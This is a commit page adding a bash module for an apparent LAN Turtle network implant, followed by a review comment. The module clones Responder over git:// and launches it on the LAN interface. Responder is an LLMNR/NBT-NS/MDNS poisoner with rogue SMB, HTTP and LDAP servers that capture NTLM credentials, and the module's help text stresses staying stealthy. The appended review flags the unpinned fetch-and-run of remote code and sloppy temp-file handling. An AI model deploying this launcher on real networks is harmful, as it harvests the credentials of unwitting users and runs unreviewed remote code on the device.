New module responder

Responder is an LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. The program itself can be viewed here: https://github.com/SpiderLabs/Responder

I have created a module that can use this program and save the logs to sshfs or tmp.
pull/8/head
IMcPwn 2015-09-19 10:09:34 -04:00
parent fb0d939a24
commit d294178b9c
1 changed files with 114 additions and 0 deletions

114
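--- /dev/null
+++ b/modules/responder
@@ -0,0 +1,114 @@
+#!/bin/bash /usr/lib/turtle/turtle_module
+VERSION="1.0"
+DESCRIPTION="Responder - LLMNR, NBT-NS and MDNS poisoner"
+CONF=/tmp/responder.form
+AUTHOR=IMcPwn
+: ${DIALOG_OK=0}
+: ${DIALOG_CANCEL=1}
+: ${DIALOG_HELP=2}
+: ${DIALOG_EXTRA=3}
+: ${DIALOG_ESC=255}
+function start {
+if [ ! -s /usr/bin/git ]; then
+opkg update && opkg install git
+fi
+if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]]; then
+rm -r /etc/turtle/Responder
+git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder
+fi
+if [ -s /etc/config/responder ];
+then
+responder_log=$(uci get responder.log)
+case $responder_log in
+sshfs)
+if pgrep sshfs > /dev/null; then
+echo "SSHFS Running"
+if [[ ! -L /etc/turtle/Responder/logs || ! -L /sshfs/Responder/logs ]]; then
+rm -r /etc/turtle/Responder/logs
+mkdir -p /sshfs/Responder/logs
+ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
+echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
+echo responder started and logs are being saved to /sshfs
+fi
+else
+echo "SSHFS not running"
+fi
+;;
+tmp)
+if [[ ! -L /etc/turtle/Responder/logs || ! -L /tmp/Responder/logs ]]; then
+rm -r /etc/turtle/Responder/logs
+mkdir -p /tmp/Responder/logs
+ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
+echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
+echo responder started and logs are being saved to /tmp
+fi
+;;
+esac
+else
+echo "Responder not configured."
+fi
+}
+function stop {
+kill $(ps | grep -w [/]etc/turtle/Responder/Responder.py | awk {'print $1'})
+}
+function status {
+if ps | grep -w -q [/]etc/turtle/Responder/Responder.py; then echo "1"; else echo "0"; fi
+}
+function configure {
+if [ -s /etc/config/responder ]
+then
+responder_log=$(uci get responder.log)
+else
+touch /etc/config/responder
+fi
+dialog --ok-label "Submit" \
+--help-button \
+--title "Responder Configuration" \
+--radiolist "\n\
+Responder is an LLMNR, NBT-NS and MDNS poisoner.\n\nNOTICE: The first time you run this module it may take a long time to load. Please let it finish.\n\nThe log files can be saved to SSHFS or /tmp.\n" 16 60 3\
+1 "Save log to SSHFS if available." off\
+2 "Save log to /tmp/" off\
+2>$CONF
+return=$?
+case $return in
+$DIALOG_OK)
+LOG=$(cat $CONF)
+case $LOG in
+1)
+uci set responder.log="sshfs"
+uci commit responder
+;;
+2)
+uci set responder.log="tmp"
+uci commit responder
+;;
+esac
+;;
+$DIALOG_CANCEL)
+rm $CONF
+clear
+exit;;
+$DIALOG_HELP)
+dialog --title "Help" \
+--msgbox "\
+Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409).\n\
+By default, the tool will only answer to File Server Service request, which is for SMB.\n\n\
+The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior.\n\n\
+For more information, see: https://github.com/SpiderLabs/Responder\n\
+" 20 60
+configure
+;;
+$DIALOG_ESC)
+clear;;
+esac
+}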
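Review bot: `start` fetches Responder over the unauthenticated `git://` transport and then runs whatever landed in `/etc/turtle/Responder` via `at`, so nothing ties the code executed on the device to a revision anyone has reviewed. Cloning over TLS and pinning closes that gap: `git clone https://github.com/SpiderLabs/Responder /etc/turtle/Responder` followed by `git -C /etc/turtle/Responder checkout <reviewed-commit>` (placeholder for a commit you have audited). `CONF=/tmp/responder.form` is a predictable path that `dialog` writes through `2>$CONF` and that is only removed on Cancel; `CONF=$(mktemp)` plus `rm -f -- "$CONF"` on every exit path of `configure` avoids a pre-planted file or symlink and a leftover form file. In both log branches the second test (`! -L /sshfs/Responder/logs`, `! -L /tmp/Responder/logs`) is always true because those paths are created with `mkdir -p`, and the launch sits inside that `if`, so the guard currently does nothing and would block starting if it were ever made to work; the log-link setup and the launch should be separate steps. In `stop` and `status` the pattern should be quoted (`grep -w '[/]etc/turtle/Responder/Responder.py'`), and `stop` should skip `kill` when no PID is found.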